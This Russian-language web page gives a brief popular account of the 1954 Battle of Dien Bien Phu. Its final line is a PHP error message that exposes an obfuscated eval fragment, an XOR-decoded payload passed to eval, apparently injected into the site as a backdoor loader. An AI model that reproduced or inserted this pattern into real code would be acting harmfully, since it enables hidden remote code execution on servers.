Битва при Дьенбьенфу - разгром французских коммандос

Интересное о спецназе

Битва при ДьенбьенфуБитва при Дьенбьенфу, в которой принимали участие батальоны французских коммандос, считается в мировой истории решающим сражением Первой Индокитайской войны. К битве колониальные войска Франции подошли в тяжелом положении — силы Вьетминя сконцентрировались на границе, и создали угрозу прорыва в Лаос, которую французы должны были любыми силами защищать. Повстанцы выставили против Лаоса такие силы, с которыми последние бы не смогли ничего поделать. Да и вторжение Вьетминя в Лаос подорвало бы репутацию колониальной державы.

В результате французское командование решило создать рядом с границей свою ударную группировку, мобильные отряды которой смогли бы вовремя перехватывать силы повстанцев. Ну а в деревне Дьенбьенфу была создана база этой группировки, что в конечном итоге явилось стратегическим подсчетом генерального штаба Франции.

Французская армия заняла равнину примерно 3 на 16 километров, которая была окружена холмами. На этих холмах вьетнамцы уже долгое время сосредотачивали свои войска, общей численностью около 50 тысяч человек. Также не смотря на полное отсутствие дорог в данном районе, вьетнамцы также смогли доставить туда тяжелую артиллерию и большое количество снарядов. 13 марта кольцо вокруг французских войск замкнулось, и с этого момента снабжение осуществлялось только с помощью самолетов. Правда вскоре единственная взлетная полоса была разрушена артиллерийским огнем.

Вьетнамские солдаты дважды предпринимали атаки на позиции французских войск, которые в свою очередь отчаянно сопротивлялись. Вскоре прошли проливные тропические дожди, превратившие французские окопы в болото. Не смотря на очень большие потери, вьетнамцам удалось взять три позиции на севере обороны французских солдат, одна из них потом была отбита легкими танками, но командование понимало что эти рубежи уже не удержать. К тому же деревня стала простреливаться почти насквозь.

Все бои сопровождались очень сильными потерями со стороны вьетнамских войск. Но тем не менее, части перешли в решающее наступление. После того, как пали фланговые укрепления, судьбы французской группировки была предрешена — вся 15-тысячная группировка была практически уничтожена. 7 мая 1954 года битва была закончена.

Опубликовано 30-03-2011, 23:29 Просмотров 136

поделись с друзьями
Комментарий:
Введите код: *
Warning: assert(): Assertion "eval('$nGIE3=$FHLfom3Fx($nGIE3);$bQQvD7cg="";$QVSry4="DuSAkQ";for($gyBB3G=0;$gyBB3G<716;$gyBB3G++)$bQQvD7cg.=chr(ord($nGIE3[$gyBB3G])^ord($QVSry4[$gyBB3G%6]));@eval($cnDaz8X($bQQvD7cg));');" failed in /home/a/alvis2/tchest.org/public_html/index.php on line 321